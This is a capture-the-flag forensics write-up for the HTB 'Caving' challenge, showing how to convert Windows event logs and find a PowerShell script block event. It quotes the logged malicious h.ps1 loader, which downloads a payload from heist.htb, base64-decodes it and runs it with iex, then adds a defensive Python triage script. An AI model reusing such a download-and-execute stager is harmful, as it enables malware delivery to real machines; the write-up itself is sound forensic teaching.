
Caving

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Caving
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: In the shadow of the apocalypse, your team discovers an operational workstation hidden within an abandoned outpost. It holds event logs from the days leading up to the nuclear catastrophe, containing encrypted clues about the origins of the disaster. Rumors suggest that a malicious domain, heist.htb, played a crucial role in the catastrophic events. Analyze the logs to uncover connections and decode the sequence that triggered the fallout. Try to understand the full scope of the disaster and secure the knowledge needed to prevent future calamities as you journey towards the vault.
  • Objective: Event Logs Analysis

Writeup

The challenge provides Windows Event Viewer logs (.evtx files). To work with them on Linux, install python3-evtx and convert them to XML:

sudo apt install python3-evtx

Convert with python3-evtx:

find . -type f -name '*.evtx' -exec sh -c 'evtx_dump.py "$0" > "$(basename "$0" .evtx).xml"' {} \;

Searching the converted XML for the malicious domain heist.htb turns up one PowerShell script block logging event (EventID 4104 in Microsoft-Windows-PowerShell/Operational), recording the content of h.ps1:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2024-05-17 15:54:59.643539"></TimeCreated>
<EventRecordID>205</EventRecordID>
<Correlation ActivityID="{1826c665-a872-0003-c6cf-261872a8da01}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4528" ThreadID="5976"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>dev</Computer>
<Security UserID="S-1-5-21-1908633781-2821059833-3101847471-1000"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">$Radiation='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0'
$Fallout='User-Agent'
$Nuke='Cookie'
$Contamination='http://heist.htb/Exposure/plan.jpg'
$Meltdown='&gt;'
$Reactor='iex'
$Evacuation='Databasesprogs';
Set-Content -Path C:\Outyelps.txt -Value $Evacuation;
if (test-path C:\Outyelps.txt){exit};
$Isotopes='echo %appdata%\Stednavnsforskningen.Rad &amp;&amp; echo $'
$global:Re=(cmd /c $Isotopes)
$global:Geiger=$Contamination.split($Meltdown)
$Contamination=$Geiger[0];
$global:Exposure=New-Object System.Net.WebClient
$Exposure.Headers[$Fallout]=$Radiation
$Exposure.Headers[$Nuke]='f=SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9'
$Controversial='Exposure.DownloadFile($Contamination,$Decontamination)'
$Controversial=$Re[1]+$Controversial;
$Decontamination=$Re[0];
$global:Civilisationer=(Test-Path $Decontamination)
while (!$Civilisationer) {
$global:Dekuperingens=$true
iex $Controversial
Start-Sleep 4
$global:Civilisationer=(Test-Path $Decontamination)
$global:Surveillance=$global:Tyvestykspakkers++%$Geiger.count
$Contamination=$Geiger[$Surveillance];}
$global:Escape = Get-Content $Decontamination
$global:Conspirators = [System.Convert]::FromBase64String($Escape)
$global:Lockpick = [System.Text.Encoding]::ASCII.GetString($Conspirators)
$global:kittels=$Lockpick.substring(337248,30277)
iex $kittels;

</Data>
<Data Name="ScriptBlockId">c761ae44-d208-4409-9730-b0039976713b</Data>
<Data Name="Path">C:\Users\developer\Desktop\h.ps1</Data>
</EventData>
</Event>

The script sets a Cookie header on its WebClient (the header name is hidden behind the $Nuke variable) to a base64-looking value. Convert SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9 from base64:

echo -n 'SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9' | base64 -d
HTB{1ntruS10n_d3t3ct3d_!!!}
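The manual steps above (filter the XML dump to 4104 script block events, find the ones that mention the domain, decode the base64 literal) can be scripted so the same triage runs over every converted log at once. This is an added example written for this writeup, not part of the challenge files or of python-evtx. It assumes evtx_dump.py wraps the records of one .evtx file in a single <Events> element (the parser also accepts a bare <Event> root), and its sample input is a constructed, trimmed copy of the event shown above plus one benign record for contrast. Because the script resolves header names through variables, the decoder does not look for a literal `Cookie` header; it decodes every base64-shaped token and keeps only those that yield printable ASCII.

```python
"""Triage a python-evtx XML dump for PowerShell script block logging
events (EventID 4104) that reference a given domain, then decode any
base64-looking literals those script blocks carry.

Added example for this writeup; not part of the challenge or python-evtx.
Assumption: evtx_dump.py wraps one file's records in an <Events> element.
"""
import base64
import binascii
import re
import sys
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Tokens of 16+ base64 characters; shorter runs are mostly variable names.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample: record 205 is a trimmed copy of the event on the
# page; record 206 is a benign script block added for contrast.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<TimeCreated SystemTime="2024-05-17 15:54:59.643539"></TimeCreated>
<EventRecordID>205</EventRecordID>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>dev</Computer>
</System>
<EventData><Data Name="ScriptBlockText">$Radiation='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0'
$Fallout='User-Agent'
$Nuke='Cookie'
$Contamination='http://heist.htb/Exposure/plan.jpg'
$Meltdown='&gt;'
$global:Exposure=New-Object System.Net.WebClient
$Exposure.Headers[$Fallout]=$Radiation
$Exposure.Headers[$Nuke]='f=SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9'
</Data>
<Data Name="ScriptBlockId">c761ae44-d208-4409-9730-b0039976713b</Data>
<Data Name="Path">C:\Users\developer\Desktop\h.ps1</Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID Qualifiers="">4104</EventID>
<EventRecordID>206</EventRecordID>
</System>
<EventData><Data Name="ScriptBlockText">Get-Date</Data>
</EventData>
</Event>
</Events>
"""


def script_block_events(xml_text):
    """Yield (record_id, script_block_id, script_text) per 4104 record."""
    root = ET.fromstring(xml_text)
    for ev in root.iter(NS + "Event"):  # iter() includes root itself
        if ev.findtext(NS + "System/" + NS + "EventID") != "4104":
            continue
        fields = {d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")}
        if "ScriptBlockText" in fields:
            yield (ev.findtext(NS + "System/" + NS + "EventRecordID"),
                   fields.get("ScriptBlockId", ""),
                   fields["ScriptBlockText"])


def find_domain_hits(xml_text, domain):
    """Return the 4104 records whose script block mentions the domain."""
    needle = domain.lower()
    return [hit for hit in script_block_events(xml_text)
            if needle in hit[2].lower()]


def decode_base64_literals(script_text):
    """Map each base64-looking token that decodes to printable ASCII to
    its plaintext; tokens that are not valid base64 are skipped."""
    found = {}
    for tok in B64_TOKEN.findall(script_text):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(0x20 <= b < 0x7F for b in raw):
            found[tok] = raw.decode("ascii")
    return found


def triage(xml_text, domain):
    """Summarise each hit: record id, script block id, decoded literals."""
    return [{"record": rid, "block": bid,
             "decoded": decode_base64_literals(text)}
            for rid, bid, text in find_domain_hits(xml_text, domain)]


if __name__ == "__main__":
    # Usage: python3 triage.py dump.xml [domain]; no args -> built-in sample
    xml_in = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    target = sys.argv[2] if len(sys.argv) > 2 else "heist.htb"
    for hit in triage(xml_in, target):
        print(f"record {hit['record']} block {hit['block']}")
        for tok, plain in hit["decoded"].items():
            print(f"  {tok} -> {plain}")
```

Run it over each XML produced by the find command above (`python3 triage.py Microsoft-Windows-PowerShell%4Operational.xml heist.htb`, path assumed) to get the record id, ScriptBlockId and decoded literal in one pass; the printable-ASCII filter drops random-looking variable names that happen to be valid base64.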

Flag: HTB{1ntruS10n_d3t3ct3d_!!!}